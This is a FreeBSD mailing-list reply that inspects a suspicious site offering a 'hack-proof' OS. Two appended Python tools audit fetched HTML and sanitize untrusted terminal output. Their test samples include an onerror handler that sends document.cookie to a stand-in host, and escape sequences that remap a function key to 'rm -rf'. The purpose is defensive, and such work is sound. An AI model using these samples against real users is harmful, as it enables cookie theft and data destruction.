Does not appear to be (too) malicious ...
- Reply: Mehmet Erol Sanliturk : "Re: Does not appear to be (too) malicious ..."
- In reply to: Mario Lobo : "Re: Hello"
Date: Sun, 28 Nov 2021 09:16:25 UTC
On 28.11.21 at 02:06, Mario Lobo wrote:
> On Sat, Nov 27, 2021, 20:27 George Mitchell <george+freebsd@m5p.com> wrote:
>
>> On 11/27/21 17:40, Obsto Clades via freebsd-hackers wrote:
>>> I hacked on the FreeBSD source code to produce a version of the OS that
>>> cannot be remotely hacked. Before you tell me that is impossible, I
>>> have an answer to that response on my FAQ page.
>>>
>>> If you are interested in checking out my OS, you can find instructions
>>> on my site's home page: https://obstoclades.tech/
>>>
>>> I invite you to check it out.
>>>
>>
>> Hmm, my mother told me never to click on links in strange emails ...
>> -- George
>>
>
> curl http://obstoclades.tech
> [...]
> <p class="red">Connection denied by Geolocation Setting.</p>
> <p><b> Reason: </b> Blocked country: <font color="red"> </font> </p>
> <p>The connection was denied because this country is blocked in the
> Geolocation settings.</p>
> <p>Please contact your administrator for assistance.</p>
> </div>
> <div class="band">WatchGuard Technologies, Inc.</div>
> </div>
> </body>
> </html>

$ fetch --no-verify-peer -v -o /tmp/obstoclades.html https://obstoclades.tech
resolving server address: obstoclades.tech:443
SSL options: 82004854
Verify hostname
TLSv1.3 connection established using TLS_AES_256_GCM_SHA384
Certificate subject: /CN=obstoclades.tech
Certificate issuer: /C=US/O=Let's Encrypt/CN=R3
requesting https://obstoclades.tech/
fetch: https://obstoclades.tech: size of remote file is not known
local size / mtime: 34916 / 1638088913
/tmp/obstoclades.html                          34 kB  181 kBps    00s

There is actual content in this file, and it does not seem to contain any malicious parts.
It starts with:

<!DOCTYPE html>
<!--
File: ObstoClades.html
Copyright (c) 2021 Obsto Clades, LLC
-->
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Security is a Joke</title>
<meta name="description" content="This demonstrates a modified BSD Operating System designed to prevent remote hacking of single-purpose computer systems.">
<link rel="stylesheet" type="text/css" href="/css/obstoclades.css"/>
<link rel="icon" type="image/x-icon" href="/favicon.ico"/>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="js/obstoclades.js" defer="defer"></script>
</head>

And besides the jquery.min.js downloaded from ajax.googleapis.com, only the following short and apparently benign script is downloaded as obstoclades.js:

/*
 * File: obstoclades.js
 * Copyright (c) 2017 Obsto Clades, LLC
 */
$(document).ready(function() {
    var $content = $(".content").hide();

    $(".img").on("click", function (e) {
        $(this).parent().parent().toggleClass("expanded");
        var ttt = $(this).parent().children(".tooltiptext");
        if ($(this).parent().parent().hasClass("expanded")) {
            ttt.replaceWith("<span class=\"tooltiptext\">Click to close</span>");
        } else {
            ttt.replaceWith("<span class=\"tooltiptext\">Click to open</span>");
        }
        $(this).parent().parent().next().slideToggle();
    });

    var textHeight = $("#left-side-header-text").height();
    $("#old_english_sheepdog").height(textHeight).width(textHeight);

    $("#button").click(function() {
        $("#contactus-form").submit();
    })
});

He invites people to attack his server using an SSH login with provided credentials, and offers US$1000 for any successful modification of the test server. See the following video, which shows that root on the console and root via su in the SSH session get quite different environments:

https://obstoclades.tech/video/demo-video.mp4

This looks like a setup with lots of restrictions applied, probably noexec mounts of temporary file systems and the like, possibly jails and/or MAC restrictions.
He thinks that an embedded system configured that way could not be attacked, but explains that his concept is limited to e.g. IoT use cases (what he calls a "single-purpose computer system").

Anyway, I could not find any malicious content on the web server. Accessing it with an SSH session (obviously configured to not allow backwards tunneling) should also not be too dangerous from a dumb terminal (but beware of escape sequence attacks possible with ANSI terminals, e.g. reprogramming of function keys with "ESC[code;string;...p").

It looks to me like a kind of honeypot setup gathering attack attempts to see whether a throw-away system can withstand them. All attack attempts are logged, either to learn how to perform them, or to actually improve the security of his protection concept in case of a successful break-in.

Regards, STefan
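The check Stefan did by hand on the fetched HTML (which hosts serve the scripts, and whether anything runs inline) can be done offline without rendering the page. The following is an added example, not code from the mail or from the obstoclades.tech site: it parses a saved page with the standard library and lists cross-origin resources, inline script bodies and inline event handlers. The sample HTML is constructed for the example; its head is modelled on the quoted one, while the body (the onerror handler, the cross-origin form action and the inline script) is invented so that each detector has something to report.

```python
"""Offline audit of a fetched HTML page: list cross-origin resources,
inline scripts and inline event handlers without rendering anything."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Tags whose attribute makes the browser fetch from, or submit to, a URL.
RESOURCE_ATTRS = {
    "script": "src", "link": "href", "iframe": "src", "img": "src",
    "form": "action", "object": "data", "embed": "src",
}


class ResourceAuditor(HTMLParser):
    """Collects what a browser would load or run if it opened the page."""

    def __init__(self, page_url):
        super().__init__()
        self.page_url = page_url
        self.origin = urlsplit(page_url).netloc.lower()
        self.external = []        # (tag, absolute URL) served by another host
        self.inline_scripts = []  # bodies of <script> elements without src
        self.event_handlers = []  # (tag, attr, value) for on*= / javascript:
        self._in_script = False
        self._script_has_src = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        attr = RESOURCE_ATTRS.get(tag)
        if attr and a.get(attr):
            url = urljoin(self.page_url, a[attr])   # resolve relative paths
            host = urlsplit(url).netloc.lower()
            if host and host != self.origin:
                self.external.append((tag, url))
        for name, value in a.items():
            # crude but effective: any on*= attribute or javascript: URL
            if name.startswith("on") or value.strip().lower().startswith("javascript:"):
                self.event_handlers.append((tag, name, value))
        if tag == "script":
            self._in_script = True
            self._script_has_src = bool(a.get("src"))
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            body = "".join(self._buf).strip()
            if body and not self._script_has_src:
                self.inline_scripts.append(body)
            self._in_script = False


def audit_html(html, page_url):
    """Return a dict summarising what the page pulls in or runs."""
    p = ResourceAuditor(page_url)
    p.feed(html)
    p.close()
    return {
        "external": p.external,
        "inline_scripts": p.inline_scripts,
        "event_handlers": p.event_handlers,
    }


# Constructed sample: head modelled on the quoted page, body invented so
# that every detector fires at least once.
SAMPLE_HTML = """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>Security is a Joke</title>
<link rel="stylesheet" type="text/css" href="/css/obstoclades.css"/>
<link rel="icon" type="image/x-icon" href="/favicon.ico"/>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.4.1/jquery.min.js"></script>
<script src="js/obstoclades.js" defer="defer"></script>
</head>
<body>
<img src="/images/sheepdog.png" onerror="fetch('https://tracker.invalid/?c=' + document.cookie)">
<form id="contactus-form" action="https://forms.invalid/submit" method="post"></form>
<script>document.getElementById("contactus-form").submit();</script>
</body>
</html>
"""

if __name__ == "__main__":
    # Typical use: audit_html(open("/tmp/obstoclades.html").read(), url)
    for key, items in audit_html(SAMPLE_HTML, "https://obstoclades.tech/").items():
        print(key)
        for item in items:
            print("   ", item)
```

Same-origin resources (the stylesheet, favicon and js/obstoclades.js in the sample) are deliberately not listed; they are served by the host you are already talking to and are better reviewed by fetching them, as the mail does with obstoclades.js. A CDN-hosted jQuery shows up as external, which is what you want: it is a third party that can change the code the page runs.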
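The escape-sequence caveat at the end of the mail is worth making concrete: a server you log into controls every byte written to your terminal, and sequences such as the ANSI.SYS key reassignment "ESC[code;string;...p", DECUDK (DCS ... | ... ST) or OSC title and clipboard commands are interpreted by the terminal, not the shell. The following is an added example, not from the mail: a filter for untrusted terminal output (a logged SSH session, for instance) that keeps only plain colour, cursor and erase sequences and strips everything else, reporting what it removed. The allowlist policy is my choice for the example, and the sample session is constructed, not a capture; the numeric form "ESC[0;68;...;13p" used in it is the ANSI.SYS reassignment of F10 (extended code 0;68) to "rm -rf" followed by Enter.

```python
"""Filter untrusted terminal output (e.g. a captured SSH session) so that
escape sequences which reprogram keys or the terminal never reach the real
terminal; plain colour/cursor/erase sequences are kept."""
import re

# One token per match, tried in this order:
#   1. CSI  ESC [ params intermediates final   (named groups filled)
#   2. OSC / DCS / APC / PM / SOS "string" sequences, up to BEL, ST (ESC \)
#      or end of input (an unterminated one would swallow the rest anyway)
#   3. any other ESC sequence (ESC c = full reset, ESC ( B charset, lone ESC)
#   4. a raw 8-bit C1 control character
_TOKEN = re.compile(
    r"\x1b\[(?P<params>[\x30-\x3f]*)(?P<inter>[\x20-\x2f]*)(?P<final>[\x40-\x7e])"
    r"|\x1b[\]P_^X].*?(?:\x07|\x1b\\|$)"
    r"|\x1b[\x20-\x2f]*[\x30-\x7e]?"
    r"|[\x80-\x9f]",
    re.DOTALL,
)

# CSI final bytes allowed through: SGR (colours/bold), cursor movement and
# erase. Everything else is dropped, including 'p', the final byte of the
# ANSI.SYS key-reassignment sequence ESC[code;string;...p, and anything with
# private parameters ('?', '>') or intermediate bytes.
SAFE_CSI_FINALS = frozenset("mHJKABCD")
_NUMERIC = re.compile(r"[0-9;]*")


def sanitize_terminal_output(text):
    """Return (clean_text, removed_sequences) for a decoded str."""
    removed = []

    def repl(m):
        final = m.group("final")              # None unless alternative 1 matched
        if (final in SAFE_CSI_FINALS
                and not m.group("inter")
                and _NUMERIC.fullmatch(m.group("params"))):
            return m.group(0)
        removed.append(m.group(0))
        return ""

    return _TOKEN.sub(repl, text), removed


# Constructed sample session (not real output): a coloured prompt, three
# hostile sequences injected by the remote side, then a normal line.
SAMPLE_SESSION = (
    "\x1b[1;32mroot@testbox\x1b[0m# uname -a\n"
    # ANSI.SYS key reassignment, numeric form: F10 (0;68) -> "rm -rf" + CR
    "\x1b[0;68;114;109;32;45;114;102;13p"
    # OSC 0: set the window title
    "\x1b]0;owned\x07"
    # DCS DECUDK: program a user-defined key with a hex-encoded string
    "\x1bP1;1|17/726D202D7266\x1b\\"
    "FreeBSD testbox 13.0-RELEASE\n"
)

if __name__ == "__main__":
    # Typical use: sys.stdout.write(sanitize_terminal_output(sys.stdin.read())[0])
    clean, removed = sanitize_terminal_output(SAMPLE_SESSION)
    print(clean, end="")
    for seq in removed:
        print("removed:", repr(seq))
```

Run it on a captured session before replaying it with cat, or pipe the live session through it; the point of reporting the removed sequences is that a key reassignment or DECUDK showing up in a supposedly harmless demo box is itself a finding. Decode the raw bytes before calling the function (errors="replace" is fine), since the C1 class only sees 8-bit controls that survived decoding.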